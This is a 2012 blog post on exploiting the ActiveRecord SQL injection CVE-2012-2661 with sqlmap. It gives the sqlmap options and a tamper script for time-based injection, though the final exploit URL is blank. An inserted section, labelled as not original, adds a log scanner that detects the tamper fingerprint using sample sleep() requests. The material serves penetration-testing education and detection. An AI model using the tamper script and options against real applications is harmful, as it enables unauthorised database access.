Monday, 18 June 2012

CVE-2012-2661 exploitation with sqlmap

To understand how this bug is exploited, you should probably read my first article, CVE-2012-2661: exploitation write-up.

After some work, I managed to get the ActiveRecord bug to work with sqlmap...

First some notes on sqlmap:

  • I'm pretty disappointed by how tamper scripts work; it would be nicer to have access to the full HTTP request instead of just the payload... maybe a patch to submit. If I had full access to the HTTP request, I'd have been able to do a full rewrite from id=1 to the right payload... anyway
  • It's really time consuming to do time-based exploitation since sqlmap doesn't try to go under 1 second for the sleep()...

So first, the options I'm using:
  • --tamper tamper/ : my tampering script, see below
  • --dbms=Mysql : the back-end is MySQL, no time wasted on other checks
  • --technique=T : time-based exploitation only, no time wasted on other checks
  • --batch : I don't want to answer questions...
  • --proxy= : always use a proxy for debugging purposes
  • --banner : I just want to dump the version

The tampering script is pretty simple to write:
  • You need to make sure each request is unique: I'm using the current time; random isn't unique, time is ;)
  • You need to take care of the encoding yourself when using a tamper script

And the source code of the tamper script is:
% cat tamper/
#!/usr/bin/env python
"""
Copyright (c) 2012 pentesterlab (
"""

from lib.core.enums import PRIORITY
from datetime import datetime

__priority__ = PRIORITY.LOW

def tamper(payload):
    # sqlmap passes the raw payload to the tamper script and uses whatever it returns
    retVal = payload
    if retVal:
        # that's disgusting, encoding =,+,>
        retVal = retVal.replace("=", "%3d")
        retVal = retVal.replace("+", "%2b")
        retVal = retVal.replace(">", "%3e")
        # make the request unique: append the current time inside a SQL comment
        # (the appended value is reconstructed from the note above, which says the current time is used)
        retVal = retVal + "/*" + str(datetime.now()) + "*/"
    return retVal
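As an added example (not part of the original post, and not PentesterLab's code), here is the reverse view of the script above: the tamper script leaves a recognisable fingerprint in web-server logs, since every request carries percent-encoded =, + and > plus a trailing /*<timestamp>*/ comment, and time-based probing puts sleep() in the parameter value. The Python below scans constructed access-log lines (hypothetical client addresses and paths) for those three indicators and flags a request only when at least two occur together, which keeps a benign /* comment */ typed into a search box from being reported on its own.

```python
import re
from urllib.parse import unquote_plus, urlsplit

# Constructed sample access-log lines (hypothetical addresses and paths), not captured traffic.
SAMPLE_LOG = """\
10.0.0.5 - - [18/Jun/2012:10:01:02 +0000] "GET /users?id=1 HTTP/1.1" 200 512
10.0.0.5 - - [18/Jun/2012:10:01:03 +0000] "GET /users?id=1%20AND%20sleep(1)/*2012-06-18%2010:01:03.123456*/ HTTP/1.1" 200 512
10.0.0.5 - - [18/Jun/2012:10:01:05 +0000] "GET /users?id=1%20AND%201%3d1/*2012-06-18%2010:01:05.654321*/ HTTP/1.1" 200 512
10.0.0.9 - - [18/Jun/2012:10:02:00 +0000] "GET /search?q=rails+/*+comment+*/ HTTP/1.1" 200 1024
"""

# Common log format: client, identity, user, [timestamp], "METHOD target PROTO", status ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

# The tamper script percent-encodes =, + and > by hand, so they show up encoded in the raw query.
ENCODED_OPS_RE = re.compile(r"%3d|%2b|%3e", re.I)
# The uniqueness trick: a /* ... */ comment at the very end of a parameter value.
TRAILING_COMMENT_RE = re.compile(r"/\*[^*]*\*/\s*$")
# Time-based probing relies on sleep(); a legitimate parameter value almost never contains it.
TIME_PROBE_RE = re.compile(r"\bsleep\s*\(", re.I)


def indicators_for_target(target):
    """Return the indicator names present in one request target (path plus query string)."""
    query = urlsplit(target).query
    found = []
    if ENCODED_OPS_RE.search(query):
        found.append("encoded_operators")
    for param in query.split("&"):
        # Decode the value the way the application would see it before matching.
        value = unquote_plus(param.partition("=")[2])
        if TRAILING_COMMENT_RE.search(value) and "trailing_comment" not in found:
            found.append("trailing_comment")
        if TIME_PROBE_RE.search(value) and "time_probe" not in found:
            found.append("time_probe")
    return found


def scan_log(text, threshold=2):
    """Return (line_number, client_ip, indicators) for lines with at least `threshold` indicators."""
    hits = []
    for number, line in enumerate(text.splitlines(), start=1):
        m = LOG_RE.match(line)
        if not m:
            continue  # not a request line we understand; skip it
        found = indicators_for_target(m.group("target"))
        if len(found) >= threshold:
            hits.append((number, m.group("ip"), found))
    return hits


if __name__ == "__main__":
    for number, ip, found in scan_log(SAMPLE_LOG):
        print("line %d from %s: %s" % (number, ip, ", ".join(found)))
```

Run against the constructed lines, the two requests from 10.0.0.5 that carry the tamper fingerprint are reported (lines 2 and 3), while the plain id=1 request and the search query containing only a comment are not; the threshold is the knob to tune if a single indicator turns out to be rare enough in your own traffic to alert on by itself.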

Now you just need to find the correct URL... and that's the hard part. After a lot of testing, the following URL works:


Now you're able to test and exploit this bug using sqlmap...

If you want a real understanding of the vulnerability and not just ./hack ..., you should check out PentesterLab's free exercise on this bug: CVE-2012-2661: ActiveRecord SQL injection
